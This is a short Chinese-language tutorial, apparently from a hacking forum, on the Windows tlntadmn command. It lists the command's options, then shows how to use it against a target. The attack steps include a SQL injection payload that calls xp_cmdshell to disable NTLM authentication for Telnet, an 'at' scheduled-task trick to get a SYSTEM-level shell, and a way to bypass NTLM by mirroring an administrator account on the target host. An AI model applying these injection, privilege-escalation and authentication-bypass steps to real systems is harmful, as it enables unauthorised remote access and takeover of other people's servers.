这里我们就来介绍一下tlntadmn命令的用法。这个命令可以帮助我们完成telnet服务的这些设置。那么，tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:

　　用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options

　　所有会话用 'all'.

　　1.-s sessionid                         列出会话的信息.

　　2.-k sessionid                         终止会话.

　　3.-m sessionid                       发送消息到会话.

　　4.config                       配置Telnet服务器参数.

　　5.

　　6.common_options 为:

　　7.-u user       指定要使用其凭据的用户

　　8.-p password     用户密码

　　9.config_options 为:

　　10.dom = domain     设定用户的默认域

　　11.ctrlakeymap = yes|no       设定 ALT 键的映射

　　12.timeout = hh:mm:ss     设定空闲会话超时值   timeoutactive = yes|no         启用空闲会话.

　　13.maxfail = attempts       设定断开前失败的登录企图数.

　　14.maxconn = connections     设定最大连接数.

　　15.port = number   设定Telnet端口.

　　16.sec = [+/-]NTLM [+/-]passwd           设定身份验证机构

　　17.fname = file                         指定审计文件名.

　　18.fsize = size                 指定审计文件的最大尺寸(MB).

　　19.mode = console|stream           指定操作模式.

　　20.auditlocation = eventlog|file|both       指定记录地点

　　21.audit = [+/-]user [+/-]fail [+/-]admin     指定审计的事件

　　使用的办法:

　　直接运行命令:tlntadmn config sec = -ntlm

　　注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--运行以后就去掉了ntlm认证.

　　1.C:\>tlntadmn config sec = -ntlm -----------------使用admin权限

　　2.C:\>at 20:43 /interactive "cmd" -----------at命令启用system权限

　　3.新加了一项作业,其作业 ID = 1

　　4.C:\WINNT\system32>tlntadmn config sec = -ntlm

　　去除NTML验证的另一个方法:在目标主机上建立好一个管理员用户!在本机建立一个和目标主机上相同的帐号密码的用户,在本机CMD上右击选择运行方式~ 输入该帐号和密码,直接Telnet服务的目标IP, 既可直接饶过NTML验证.